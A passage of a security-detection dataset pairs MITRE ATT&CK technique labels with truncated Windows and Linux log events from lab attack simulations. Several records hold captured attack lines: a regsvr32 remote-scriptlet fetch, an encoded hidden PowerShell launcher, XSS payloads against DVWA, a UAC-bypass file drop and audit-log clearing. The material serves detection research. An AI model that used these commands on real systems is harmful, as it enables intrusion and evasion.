C:\Users\wardog\AppData\Local\Microsoft\Windows\INetCache\IE\JCR0HU4M\mshta[1].sct CreationUtcTime: 2020-10-22 06:21:38.764 || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x3e28 Process Information: Process ID: 0x275c Process Name: C:\Windows\System32\mshta.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x754 Resource Attributes: - Process Information: Process ID: 0x275c Process Name || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x754 Resource Attributes: - Process Information: Process ID: 0x275c Process
76
Linux-APT-Dataset-2024
linux
21
6
Discovery
T1082
2024-01-07T08:53:42.326000+03:00
2024-01-07T10:34:52.238000+03:00
1. sudo || 2. cat || 3. sudo || 4. cat || 5. uname || 6. ls
77
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Privilege Escalation
T1548.002
2020-09-04T10:30:00.668000+03:00
2020-09-04T10:30:58.792000+03:00
1. File created: RuleName: - UtcTime: 2020-09-04 07:29:58.340 ProcessGuid: {3ddc5665-e7cd-5f51-1c00-000000000500} ProcessId: 1260 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-09-04 07:07:57.419 || 2. Pipe Created: RuleName: - EventType: CreatePipe UtcTime: 2020-09-04 07:30:12.714 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe || 3. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-09-04 07:30:12.714 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe || 4. Pipe Created: RuleName: - EventType: CreatePipe UtcTime: 2020-09-04 07:30:12.714 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe || 5. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-09-04 07:30:12.714 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe || 6. "C:\windows\system32\whoami.exe" /groups || 7. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 07:30:12.729 ProcessGuid: {3ddc5665-e7bc-5f51-0100-000000000500} ProcessId: 4 Image: System Device: \Device\HarddiskVolume3 || 8. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 07:30:12.729 ProcessGuid: {3ddc5665-e7bc-5f51-0100-000000000500} ProcessId: 4 Image: System Device: \Device\HarddiskVolume2 || 9. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 07:30:12.729 ProcessGuid: {3ddc5665-e7bc-5f51-0100-000000000500} ProcessId: 4 Image: System Device: \Device\HarddiskVolume1 || 10. File created: RuleName: - UtcTime: 2020-09-04 07:30:12.807 ProcessGuid: {3ddc5665-e7cd-5f51-2c00-000000000500} ProcessId: 1924 Image: C:\windows\system32\svchost.exe TargetFilename: C:\Windows\Prefetch\WHOAMI.EXE-B8288E39.pf CreationUtcTime: 2020-09-04 07:09:26.904 || 11. Pipe Created: RuleName: - EventType: CreatePipe UtcTime: 2020-09-04 07:30:12.823 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe || 12. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-09-04 07:30:12.823 ProcessGuid: {3ddc5665-e80d-5f51-2501-000000000500} ProcessId: 1376 PipeName: <Anonymous Pipe> Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
78
Linux-APT-Dataset-2024
linux
4
12
Initial Access
T1190
2024-01-06T10:13:42.571000+03:00
2024-01-06T10:19:27.128000+03:00
1. curl || 2. curl || 3. curl || 4. curl || 5. curl || 6. curl || 7. curl || 8. curl || 9. curl || 10. curl || 11. curl || 12. curl
79
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Credential Access
T1003.004
2020-09-22T10:36:25.863000+03:00
2020-09-22T10:37:28.759000+03:00
1. A process has exited. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E4 Process Information: Process ID: 0x1f04 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Exit Status: 0x0 || 2. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x3e4c Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4a8 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4a8 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request In || 5. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x4a8 Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 6. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x34a4 Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 7. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4a0 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4a0 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request In || 9. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x4a0 Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 10. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x34a4 Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4ac Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4ac Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request In
80
Linux-APT-Dataset-2024
linux
machine-1
12
Execution
T1059
2023-10-05T23:22:39.901000+03:00
2023-10-20T21:16:26.324000+03:00
1. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ealert(a%2eb%2ec%2ed)%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 2. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cx%20contenteditable%20oninput%3dalert(1)%3einput%20here!&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 3. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cform%3e%3cinput%20formaction%3djavascript%3aalert(1)%20type%3dimage%20src%3dSOURCE%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari || 4. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%20src%3d%22%2f%2fbrutelogic%2ecom%2ebr%26sol%3b1%2ejs%26num%3b&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 5. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cimg%20src%3dx%20onerror%3dalert(String%2efromCharCode(88,83,83))%3b%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 6. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=javascript%3a%2f%2f%3c%2ftitle%3e%3c%2ftextarea%3e%3c%2fstyle%3e%3c%2fscript%20--%3e%3cli%20'%2f%2f%22%20'%2a%2falert()%2f%2a',%20onclick%3dalert()%2f%2f&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap || 7. 192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ewindow['alert'](document['domain'])%3cscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 8. 192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%20src%3d%2f%2fbrutelogic%2ecom%2ebr%2f1%2ejs%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 9. 192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cform%3e%3cinput%20formaction%3djavascript%3aalert(1)%20type%3dimage%20src%3dSOURCE%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari || 10. 192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cinput%20autofocus%20onblur%3dalert(1)%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 11. 192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3c%3c%2fscript%2fscript%3e%3cscript%3eeval('%5c%5cu'%2b'0061'%2b'lert(1)')%2f%2f%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.13 || 12. 192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%3cscript%3ewindow%2eonload%3dfunction()%7bdocument%2eforms[0]%2emessage%2evalue%3d'1'%3b%7d%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1
81
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Defense Evasion
T1218.003
2020-10-22T04:54:20.493000+03:00
2020-10-22T04:54:34.403000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. A process has exited. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Process Information: Process ID: 0x96c Process Name: C:\Windows\System32\RuntimeBroker.exe Exit Status: 0x0 || 3. File created: RuleName: - UtcTime: 2020-10-22 05:54:22.399 ProcessGuid: {39e4a257-f138-5f8b-5600-000000000700} ProcessId: 3408 Image: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe TargetFilename: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\5528BCFA35E9B8028BD7AF66EF7497F1 CreationUtcTime: 2020-10-22 05:54:22.399 || 4. File created: RuleName: - UtcTime: 2020-10-22 05:54:22.415 ProcessGuid: {39e4a257-f138-5f8b-5600-000000000700} ProcessId: 3408 Image: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe TargetFilename: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{2A2DEE72-1CA1-4461-AA76-4AC85DB25300} CreationUtcTime: 2020-10-22 05:54:22.415 || 5. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x458c Process Information: Process ID: 0x1a34 Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0xb6c Resource Attributes: - Process Information: Process ID: 0x1a34 Process Name: C:\Windows\System32\Wi || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0xb6c Process Information: Process ID: 0x1a34 Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 8. File created: RuleName: - UtcTime: 2020-10-22 05:54:22.931 ProcessGuid: {39e4a257-1e6c-5f91-c712-000000000700} ProcessId: 6708 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\ProgramData\T1218.003_uacbypass.inf CreationUtcTime: 2020-10-22 05:54:22.931 || 9. File created: RuleName: - UtcTime: 2020-10-22 05:54:23.009 ProcessGuid: {39e4a257-f138-5f8b-5600-000000000700} ProcessId: 3408 Image: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe TargetFilename: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\FE81AF389681387003D4DD3B964FE51B CreationUtcTime: 2020-10-22 05:54:23.009 || 10. Dns query: RuleName: - UtcTime: 2020-10-22 05:54:21.349 ProcessGuid: {39e4a257-1e6c-5f91-c712-000000000700} ProcessId: 6708 QueryName: github.com QueryStatus: 0 QueryResults: ::ffff:140.82.113.3; Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 11. Dns query: RuleName: - UtcTime: 2020-10-22 05:54:21.525 ProcessGuid: {39e4a257-1e6c-5f91-c712-000000000700} ProcessId: 6708 QueryName: raw.githubusercontent.com QueryStatus: 0 QueryResults: type: 5 github.map.fastly.net;::ffff:151.101.248.133; Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 12. Network connection detected: RuleName: - UtcTime: 2020-10-22 05:54:21.354 ProcessGuid: {39e4a257-1e6c-5f91-c712-000000000700} ProcessId: 6708 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: WORKSTATION5\wardog Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.2.5 SourceHostname: - SourcePort: 52093 SourcePortName: - DestinationIsIpv6: false DestinationIp: 1
82
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Execution
T1059.005
2020-09-04T23:09:40.845000+03:00
2020-09-04T23:10:41.062000+03:00
1. File created: RuleName: - UtcTime: 2020-09-04 20:09:38.962 ProcessGuid: {860ba2e3-8b50-5f52-1e00-000000000400} ProcessId: 1360 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-09-04 18:45:38.114 || 2. "C:\windows\System32\WScript.exe" "C:\Users\pgustavo\Desktop\launcher.vbs" || 3. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.095 ProcessGuid: {860ba2e3-993f-5f52-8402-000000000400} ProcessId: 5728 Image: C:\windows\Explorer.EXE TargetFilename: C:\Users\pgustavo\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9f5c7755804b850a.automaticDestinations-ms CreationUtcTime: 2020-09-04 20:09:55.095 || 4. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.141 ProcessGuid: {860ba2e3-993f-5f52-8402-000000000400} ProcessId: 5728 Image: C:\windows\Explorer.EXE TargetFilename: C:\Users\pgustavo\AppData\Roaming\Microsoft\Windows\Recent\launcher.lnk CreationUtcTime: 2020-09-04 20:09:55.141 || 5. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.282 ProcessGuid: {860ba2e3-993f-5f52-8402-000000000400} ProcessId: 5728 Image: C:\windows\Explorer.EXE TargetFilename: C:\Users\pgustavo\AppData\Local\Microsoft\Windows\History\desktop.ini CreationUtcTime: 2020-09-04 20:09:55.282 || 6. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.282 ProcessGuid: {860ba2e3-9946-5f52-9102-000000000400} ProcessId: 3440 Image: C:\windows\system32\DllHost.exe TargetFilename: C:\Users\pgustavo\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012020090420200905 CreationUtcTime: 2020-09-04 20:09:55.282 || 7. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.282 ProcessGuid: {860ba2e3-9946-5f52-9102-000000000400} ProcessId: 3440 Image: C:\windows\system32\DllHost.exe TargetFilename: C:\Users\pgustavo\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012020090420200905\container.dat CreationUtcTime: 2020-09-04 20:09:55.282 || 8. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.679 ProcessGuid: {860ba2e3-8b58-5f52-4900-000000000400} ProcessId: 3136 Image: C:\Program Files\Windows Defender\MsMpEng.exe TargetFilename: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\72B112631B88241C5BCB89349055BFAF CreationUtcTime: 2020-09-04 20:09:55.679 || 9. File created: RuleName: - UtcTime: 2020-09-04 20:09:55.694 ProcessGuid: {860ba2e3-8b58-5f52-4900-000000000400} ProcessId: 3136 Image: C:\Program Files\Windows Defender\MsMpEng.exe TargetFilename: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{401294F6-8625-4EBC-86C8-03E371B1E3AA} CreationUtcTime: 2020-09-04 20:09:55.694 || 10. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-09-04 20:09:55.710 ProcessGuid: {860ba2e3-8b58-5f52-4900-000000000400} ProcessId: 3136 PipeName: \wkssvc Image: C:\Program Files\Windows Defender\MsMpEng.exe || 11. "C:\windows\System32\WScript.exe" "C:\Users\pgustavo\Desktop\launcher.vbs" || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-2079883792-3656946353-945924832-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2D5A4B Object: Object Server: Security Handle ID: 0x3b08 Process Information: Process ID: 0x1660 Process Name: C:\Windows\explorer.exe
83
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.mordor.local
12
Defense Evasion
T1218.010
2020-07-22T06:27:53.548000+03:00
2020-07-22T06:28:32.523000+03:00
1. "C:\windows\system32\regsvr32.exe" /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll || 2. "C:\windows\system32\regsvr32.exe" /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll || 3. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAcwBJAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAFIAUwBJAE8AbgAuAE0AQQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJAA1ADcAYQBmADAAPQBbAHIAZQBGAF0ALgBBAHMAUwBFAE0AQgBsAFkALgBHAEUAdABUAHkAUABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBJAGUAYABMAGQA || 4. The handle to an object was closed. Subject : Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Handle ID: 0x3364 Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32\regsvr32.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x88 Resource Attributes: - Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32\reg || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x88 Resource Attributes: - Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32 || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Handle ID: 0x88 Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32\regsvr32.exe || 8. \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 || 9. The handle to an object was closed. Subject : Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Handle ID: 0x17f8 Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32\regsvr32.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x47c Resource Attributes: - Process Information: Process ID: 0x24a8 Process Name || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x47c Resource Attributes: - Process Information: Process ID: 0x24a8 Process || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-2253742117-2054739524-205962475-1104 Account Name: pgustavo Account Domain: MORDOR Logon ID: 0x24579A8 Object: Object Server: Security Handle ID: 0x47c Process Information: Process ID: 0x24a8 Process Name: C:\Windows\System32\regsvr32.exe
84
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Privilege Escalation
T1134.002
2021-06-11T12:07:15.635000+03:00
2021-06-11T12:08:05.621000+03:00
1. ping -n 3 127.0.0.1 || 2. A process has exited. Subject: Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Process Information: Process ID: 0x874 Process Name: C:\Windows\System32\PING.EXE Exit Status: 0x0 || 3. File created: RuleName: - UtcTime: 2021-06-12 01:07:17.659 ProcessGuid: {e2c04bb9-a3ee-60c3-5100-000000000300} ProcessId: 2288 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\Prefetch\PING.EXE-7E94E73E.pf CreationUtcTime: 2021-06-11 20:19:10.589 || 4. "C:\Users\APT-Simulator\Documents\APTSimulator-master\\helpers\7z.exe" e -paptsimulator "C:\Users\APT-Simulator\Documents\APTSimulator-master\\enc-toolset.7z" -aoa -o"C:\TMP" toolset\CreateNamedPipe.exe || 5. "C:\Users\APT-Simulator\Documents\APTSimulator-master\\helpers\7z.exe" e -paptsimulator "C:\Users\APT-Simulator\Documents\APTSimulator-master\\enc-toolset.7z" -aoa -o"C:\TMP" toolset\CreateNamedPipe.exe || 6. The handle to an object was closed. Subject : Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Object: Object Server: Security Handle ID: 0x1b20 Process Information: Process ID: 0x1948 Process Name: C:\Users\APT-Simulator\Documents\APTSimulator-master\helpers\7z.exe || 7. A handle to an object was requested. Subject: Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x94 Resource Attributes: - Process Information: Process ID: 0x1948 Process Name: C:\Users\APT-S || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x94 Resource Attributes: - Process Information: Process ID: 0x1948 Process Name: C:\Users\A || 9. The handle to an object was closed. Subject : Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Object: Object Server: Security Handle ID: 0x94 Process Information: Process ID: 0x1948 Process Name: C:\Users\APT-Simulator\Documents\APTSimulator-master\helpers\7z.exe || 10. File created: RuleName: - UtcTime: 2021-06-12 01:07:17.822 ProcessGuid: 